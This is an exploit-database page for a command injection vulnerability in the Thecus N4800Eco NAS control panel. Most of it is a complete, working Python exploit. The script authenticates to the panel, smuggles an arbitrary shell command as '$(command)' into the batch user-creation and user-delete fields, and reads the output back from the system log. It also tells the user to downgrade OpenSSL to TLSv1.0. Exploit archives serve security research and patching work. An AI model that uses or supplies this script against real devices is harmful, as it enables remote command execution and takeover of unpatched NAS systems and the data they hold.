header-logo
Suggest Exploit
vendor:
N4800Eco Nas Server Control Panel
by:
Metin Yunus Kandemir
9.8
CVSS
HIGH
Command Injection
78
CWE
Product Name: N4800Eco Nas Server Control Panel
Affected Version From: N4800Eco
Affected Version To: N4800Eco
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
2021

Thecus N4800Eco Nas Server Control Panel – Comand Injection

The Thecus N4800Eco Nas Server Control Panel is vulnerable to command injection. An attacker can exploit this vulnerability by sending malicious input to the web application. This can allow the attacker to execute arbitrary commands on the vulnerable system.

Mitigation:

Input validation should be used to prevent command injection attacks. Additionally, the application should be configured to use the least privileged user account.
Source

Exploit-DB raw data:

# Exploit Title: Thecus N4800Eco Nas Server Control Panel - Comand Injection
# Date: 01/06/2021
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: http://www.thecus.com/
# Software Link: http://www.thecus.com/product.php?PROD_ID=83
# Version: N4800Eco
# Description: https://docs.unsafe-inline.com/0day/thecus-n4800eco-nas-server-control-panel-comand-injection


#!/usr/bin/python3
import requests
import sys
import urllib3


# To fix SSL error that occurs when the script is started.
# 1- Open /etc/ssl/openssl.cnf file
# At the bottom of the file:
# [system_default_sect]
# MinProtocol = TLSv1.2
# CipherString = DEFAULT@SECLEVEL=2
# 2- Set value of MinProtocol as TLSv1.0


def readResult(s, target):
    d = {
        "fun": "setlog",
        "action": "query",
        "params": '[{"start":0,"limit":1,"catagory":"sys","level":"all"}]'
    }
    url = "http://" + target + "/adm/setmain.php"
    resultReq = s.post(url, data=d, verify=False)
    dict = resultReq.text.split()
    print("[+] Reading system log...\n")
    print(dict[5:8])     #change this range to read whole output of the command

def delUser(s, target, command):
    d = {
        "action": "delete",
        "username": "$("+command+")"
    }
    url = "http://" + target + "/adm/setmain.php?fun=setlocaluser"
    delUserReq = s.post(url, data=d, allow_redirects=False, verify=False)

    if 'Local User remove succeeds' in delUserReq.text:
        print('[+] %s command was executed successfully' % command)
    else:
        print('[-] %s command was not executed!' %command)
        sys.exit(1)
    readResult(s, target)

def addUser(s, target, command):
    d = {'batch_content': '%24('+command+')%2C22222%2C9999'}
    url = "http://" + target + "/adm/setmain.php?fun=setbatch"
    addUserReq = s.post(url, data=d, allow_redirects=False, verify=False)

    if 'Users and groups were created successfully.' in addUserReq.text:
        print('[+] Users and groups were created successfully')
    else:
        print('[-] Users and groups were not created')
        sys.exit(1)
    delUser(s, target, command)

def login(target, username, password, command=None):
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    s = requests.Session()
    d = {
        "&eplang": "english",
        "p_pass": password,
        "p_user": username,
        "username": username,
        "pwd": password,
        "action": "login",
        "option": "com_extplorer"
    }
    url = "http://" + target + "/adm/login.php"
    loginReq = s.post(url, data=d, allow_redirects=False, verify=False)

    if '"success":true' in loginReq.text:
        print('[+] Authentication successful')
    elif '"success":false' in loginReq.text:
        print('[-] Authentication failed!')
        sys.exit(1)
    else:
        print('[-] Something went wrong!')
        sys.exit(1)
    addUser(s, target, command)

def main(args):
    if len(args) != 5:
        print("usage: %s targetIp:port username password command" % (args[0]))
        print("Example 192.168.1.13:80 admin admin id")
        sys.exit(1)
    login(target=args[1], username=args[2], password=args[3], command=args[4])


if __name__ == "__main__":
    main(args=sys.argv)

Navigation

Suggest Exploit

Services By CQR